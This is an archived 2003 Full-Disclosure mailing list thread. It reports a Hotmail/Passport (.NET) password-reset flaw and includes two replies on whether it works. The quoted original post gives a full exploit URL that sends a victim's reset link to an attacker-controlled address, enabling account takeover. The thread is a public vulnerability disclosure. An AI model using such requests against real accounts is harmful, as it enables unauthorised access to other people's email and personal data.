lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <02c401c31523$30024680$e04f7780@ttol>
From: WChang at pnwsoft.com (Wayne Chang (Pacific Northwest Software))
Subject: Hotmail & Passport (.NET Accounts) Vulnerability

I just tried this (with permission from the email owners).  It worked on all
occasions.

Wayne Chang
Pacific Northwest Software
----- Original Message -----
From: "Christopher F. Herot" <cherot@...liedmessaging.com>
To: <mfrd@...itudex.com>; <full-disclosure@...ts.netsys.com>
Sent: Thursday, May 08, 2003 12:05 AM
Subject: RE: [Full-Disclosure] Hotmail & Passport (.NET Accounts)
Vulnerability


>
> I just tried this.  It does indeed generate the "reset password" email
> and link, which is scary, but following the instructions does not really
> reset the password, at least not for the limited test I performed.
>
>
> > -----Original Message-----
> > From: Muhammad Faisal Rauf Danka [mailto:mfrd@...itudex.com]
> > Sent: Wednesday, May 07, 2003 10:51 PM
> > To: full-disclosure@...ts.netsys.com
> >
> > Hotmail & Passport (.NET Accounts) Vulnerability
> >
> > There is a very serious and stupid vulnerability or badcoding in
> Hotmail / Passport's (.NET
> > Accounts)
> >
> > I tried sending emails several times to Hotmail / Passport contact
> addresses, but always met with
> > the NLP bots.
> >
> > I guess I don't need to go in details of how cruical and important
> Hotmail / Passport's .NET
> > Account passport is to anyone.
> >
> > You name it and they have it, E-Commerce, Credit Card processing,
> Personal Emails, Privacy Issues,
> > Corporate Espionage, maybe stalkers and what not.
> >
> > It is so simple that it is funny.
> >
> > All you got to do is hit the following in your browser:
> >
> >
> https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmai
> l.com&id=&cb=&prefem=attac
> > ker@...acker.com&rst=1
> >
> > And you'll get an email on attacker@...acker.com asking you to click
> on a url something like this:
> >
> >
> http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLN
> um=0&lc=1033
> >
> > From that url, you can reset the password and I don't think I need to
> say anything more about it.
> >
> > Vulnerability / Flaw discovered : 12th April 2003
> > Vendor / Owner notified : Yes (as far as emailing
> them more than 10 times is concerned)
> >
> >
> > Regards
> > --------
> > Muhammad Faisal Rauf Danka
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ